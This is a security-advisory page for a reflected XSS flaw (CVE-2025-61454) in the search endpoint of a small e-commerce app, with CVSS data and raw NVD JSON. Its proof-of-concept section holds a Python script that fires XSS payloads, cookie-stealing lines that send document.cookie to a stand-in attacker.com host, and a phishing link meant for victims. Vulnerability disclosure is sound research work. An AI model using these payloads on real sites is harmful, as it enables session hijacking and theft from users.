Security Vulnerability Report
中文
CVE-2025-61454 CVSS 6.1 MEDIUM

CVE-2025-61454

Published: 2025-10-20 13:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A Cross-Site Scripting (XSS) vulnerability exists in Bhabishya-123 E-commerce 1.0, specifically within the search endpoint. Unsanitized input in the /search parameter is directly reflected back into the response HTML, allowing attackers to execute arbitrary JavaScript in the browser of a user who visits a malicious link or submits a crafted request.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bhabishya-123 E-commerce 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2025-61454 - Reflected XSS PoC for Bhabishya-123 E-commerce 1.0 ## Vulnerability Location: /search endpoint ## The /search parameter reflects user input directly into HTML response without sanitization ## ============================================ ## PoC 1: Basic Reflected XSS via GET request ## ============================================ # Target URL format: # http://target.com/search?q=<script>alert('XSS')</script> import requests target_url = "http://target.com/search" # Payload 1: Simple script injection payload_script = '<script>alert("XSS-Vulnerability-CVE-2025-61454")</script>' # Payload 2: Event handler based (bypasses some filters) payload_img = '<img src=x onerror=alert(document.cookie)>' # Payload 3: SVG-based XSS payload_svg = '<svg/onload=alert(1)>' # Payload 4: Cookie stealing (for demonstration) # Replace with attacker's controlled server attacker_server = "http://attacker.com/steal" payload_cookie_steal = f'<script>new Image().src="{attacker_server}?c="+document.cookie</script>' def exploit_xss(target_url, parameter, payload): """ Send a crafted request to the vulnerable search endpoint and verify if the payload is reflected in the response. """ params = {parameter: payload} headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } response = requests.get(target_url, params=params, headers=headers) # Check if the payload is reflected in the response (indicating XSS) if payload in response.text: print(f"[+] XSS Confirmed! Payload reflected in response.") print(f"[+] Target: {target_url}") print(f"[+] Parameter: {parameter}") print(f"[+] Payload: {payload}") print(f"[+] Status Code: {response.status_code}") return True else: print(f"[-] Payload not reflected. Target may not be vulnerable.") return False # Run exploit if __name__ == "__main__": # Try multiple payloads against the /search endpoint payloads = [payload_script, payload_img, payload_svg] for p in payloads: print(f"\n[*] Testing payload: {p[:50]}...") exploit_xss(target_url, "q", p) ## ============================================ ## PoC 2: URL that can be sent to victims ## ============================================ # Malicious URL to distribute via phishing/social engineering: # http://target.com/search?q=<script>alert(document.domain)</script> # # For cookie theft: # http://target.com/search?q=<script>fetch("http://attacker.com/?c="+document.cookie)</script> ## ============================================ ## PoC 3: cURL command for manual testing ## ============================================ # curl -v "http://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E" ## Remediation Notes: ## - Implement HTML entity encoding on all user-supplied output ## - Use Content-Security-Policy (CSP) headers ## - Sanitize input using a whitelist approach ## - Use frameworks that auto-escape output (e.g., React, Angular)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61454", "sourceIdentifier": "[email protected]", "published": "2025-10-20T13:15:45.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in Bhabishya-123 E-commerce 1.0, specifically within the search endpoint. Unsanitized input in the /search parameter is directly reflected back into the response HTML, allowing attackers to execute arbitrary JavaScript in the browser of a user who visits a malicious link or submits a crafted request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/tansique-17/CVE-2025-61454", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.